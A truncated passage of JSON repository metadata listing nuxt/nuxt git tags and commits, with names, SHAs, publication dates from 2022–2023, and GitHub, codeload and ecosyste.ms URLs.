t/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"@nuxt/ui-templates@1.1.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1/manifests"},{"name":"@nuxt/ui@0.4.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"@nuxt/ui-templates@1.1.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0/manifests"},{"name":"@nuxt/ui-assets@0.2.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0/manifests"},{"name":"@nuxt/ui@0.4.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"@nuxt/ui-templates@0.4.0","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0/manifests"},{"name":"@nuxt/ui@0.3.3","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"@nuxt/ui-templates@0.3.3","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3/manifests"},{"name":"@nuxt/ui@0.3.2","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"@nuxt/ui-templates@0.3.2","sha":"dafb9ed0e436601b44a7dc8e6caa459314193ec7","kind":"tag","published_at":"2022-08-12T21:23:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"@nuxt/ui-templates@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1/manifests"},{"name":"@nuxt/ui@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"@nuxt/ui-templates@0.3.0","sha":"3623350feeb4b0ba4906611071430c7577440a75","kind":"tag","published_at":"2022-07-21T12:41:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0/manifests"},{"name":"@nuxt/ui-templates@0.2.2","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2/manifests"},{"name":"@nuxt/ui@0.3.0","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"@nuxt/ui-templates@0.2.1","sha":"1e0e83e29ac3633e299b9261c64122b360216200","kind":"tag","published_at":"2022-07-12T14:12:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1/manifests"},{"name":"@nuxt/ui-templates@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0/manifests"},{"name":"@nuxt/ui@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"@nuxt/ui-templates@0.1.1","sha":"2ea0ad23512a0ce341092dd08162503d94b8eef9","kind":"tag","published_at":"2022-05-07T18:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"@nuxt/ui@0.1.1","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-05-02T09:31:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"@nuxt/ui-templates@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0/manifests"},{"name":"@nuxt/ui-assets@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.1.0","dependencies_parsed